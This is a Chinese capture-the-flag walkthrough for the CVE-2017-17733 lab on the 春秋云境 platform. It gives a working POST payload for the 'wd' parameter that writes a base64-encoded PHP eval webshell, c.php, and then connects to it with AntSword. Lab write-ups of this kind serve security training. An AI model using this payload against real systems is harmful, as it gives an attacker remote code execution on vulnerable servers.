春秋云境CVE-2017-17733

1.阅读靶场介绍

这里可以给各位讲一下自己的愚见

就是涉及这些字眼的靶场介绍"远程攻击者可借助index.php?m=vod-search请求中的'wd'参数利用该漏洞执行命令。"

简单来说就是:关于路径还有攻击参数的

我们都可以直接使用hackbar这种形式的工具去完成webshell

2.启动靶场

我们会得到一个如下的页面

接下来就是去攻克他了,其实也是一个很简单的步骤

3.poc

我们对页面点击F12

然后输入这个url

https://eci-2zedfyzgnxg3tgaoyz2u.cloudeci1.ichunqiu.com:80/index.php?m=vod-search

再post这个参数

wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

这里的意思就是发送一个参数给这个url

文件是c.php,内容是c(密码)

这里我们可以去访问一下
https://eci-2zedfyzgnxg3tgaoyz2u.cloudeci1.ichunqiu.com:80/c.php

这就说明上面的所有步骤都是成功的

好啦接下里就是中国蚁剑启动

输入完如上的数据后,点击测试后添加

进去就是这个页面哟

flag就在你们面前了

恭喜各位彦祖和亦非们又攻克一个靶场了

感谢你们宝贵的时间

相关推荐
Aphasia3112 天前
VPN 与内网穿透
安全
Mr_愚人派3 天前
当"Claude"不再是 Claude:一次第三方 API 代理引发的 AI 身份伪造排查实录
人工智能·安全
DaLi Yao3 天前
【无标题】
人工智能·安全
Alsn863 天前
等待学习-学习目录:Docker 容器安全攻防
学习·安全·docker
网络研究院3 天前
2026年网络安全
网络·安全·法律·法规·趋势·发展
treesforest3 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
零零信安3 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
开发小能手-roy3 天前
StringBuilder vs StringBuffer:2024年还需要线程安全字符串吗?
开发语言·python·安全
上海云盾第一敬业销售3 天前
深入解析WAF的工作原理与机制
web安全·ddos
_阿伟_3 天前
JWT介绍
安全